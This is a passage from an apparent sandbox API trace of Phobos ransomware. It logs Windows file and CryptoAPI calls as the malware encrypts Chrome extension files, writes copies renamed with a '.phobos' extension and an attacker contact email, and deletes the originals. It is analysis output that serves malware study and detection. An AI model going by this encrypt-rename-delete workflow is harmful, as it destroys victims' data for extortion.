GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=225) returned 1 [0153.324] CloseHandle (hObject=0x188) returned 1 [0153.324] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json")) returned 0x2020 [0153.324] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.324] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.324] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.325] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0153.325] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.325] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe1, lpOverlapped=0x0) returned 1 [0153.326] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0153.326] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0153.327] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0153.327] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.327] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.327] CryptDestroyKey (hKey=0xa32968) returned 1 [0153.327] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.327] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.327] CloseHandle (hObject=0x188) returned 1 [0153.327] CloseHandle (hObject=0x190) returned 1 [0153.328] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json")) returned 1 [0153.329] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.329] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=254) returned 1 [0153.329] CloseHandle (hObject=0x190) returned 1 [0153.330] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json")) returned 0x2020 [0153.330] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.330] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.330] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.330] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0153.330] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.330] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xfe, lpOverlapped=0x0) returned 1 [0153.331] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100, dwBufLen=0x100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100) returned 1 [0153.331] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x100, lpOverlapped=0x0) returned 1 [0153.332] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0153.332] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.333] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.333] CryptDestroyKey (hKey=0xa32968) returned 1 [0153.333] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.333] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.333] CloseHandle (hObject=0x190) returned 1 [0153.333] CloseHandle (hObject=0x188) returned 1 [0153.333] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json")) returned 1 [0153.334] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.335] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=227) returned 1 [0153.335] CloseHandle (hObject=0x188) returned 1 [0153.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json")) returned 0x2020 [0153.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.335] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.335] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.336] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0153.336] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.336] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe3, lpOverlapped=0x0) returned 1 [0153.337] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0153.337] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0153.338] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0153.338] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.338] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.338] CryptDestroyKey (hKey=0xa32968) returned 1 [0153.338] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.338] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.338] CloseHandle (hObject=0x188) returned 1 [0153.338] CloseHandle (hObject=0x190) returned 1 [0153.339] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json")) returned 1 [0153.340] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0153.409] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=212) returned 1 [0153.409] CloseHandle (hObject=0x15c) returned 1 [0153.409] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json")) returned 0x2020 [0153.409] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0153.409] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.409] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0153.410] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0153.410] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.410] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd4, lpOverlapped=0x0) returned 1 [0153.411] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0153.411] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0153.411] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0153.412] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.412] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.412] CryptDestroyKey (hKey=0xa32c28) returned 1 [0153.412] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.412] CryptDestroyKey (hKey=0xa32da8) returned 1 [0153.412] CloseHandle (hObject=0x15c) returned 1 [0153.412] CloseHandle (hObject=0x14c) returned 1 [0153.412] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json")) returned 1 [0153.413] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0153.413] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4984) returned 1 [0153.413] CloseHandle (hObject=0x14c) returned 1 [0153.413] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png")) returned 0x2020 [0153.413] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0153.414] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.414] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 